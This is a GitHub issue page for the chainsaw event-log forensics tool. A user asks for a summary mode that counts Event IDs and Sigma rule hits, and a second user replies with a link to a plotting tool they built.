chainsaw icon indicating copy to clipboard operation
chainsaw copied to clipboard
verified publisher icon WithSecureLabs

Feature Request: Event Log ID / Sigma Summary

Open ssnkhan opened this issue 1 year ago • 1 comments

Would be helpful if chainsaw could provide high level stats detailing the frequency of event code IDs observed in an Event Log, like Eric Zimmerman's evtxecmd tool. Potential usage would be chainsaw hunt --stats-only evtx_attack_samples.

Event ID        Count
300             1
400             666
403             404
600             4,939
800             197

Another option --stats-only-sigma would produce a similar frequency table, but with a count of Sigma hits.

Thanks for this amazing tool!

ssnkhan avatar Jan 10 '24 10:01 ssnkhan

I am creating a tool to plot this output, I was already planning on implementing this stats idea, i don't know if this helps anyone or not.

image

It also plots AWS logs and you can see how the stats output is looking for that.

https://github.com/dbissell6/Thundaga

dbissell6 avatar Jan 10 '24 23:01 dbissell6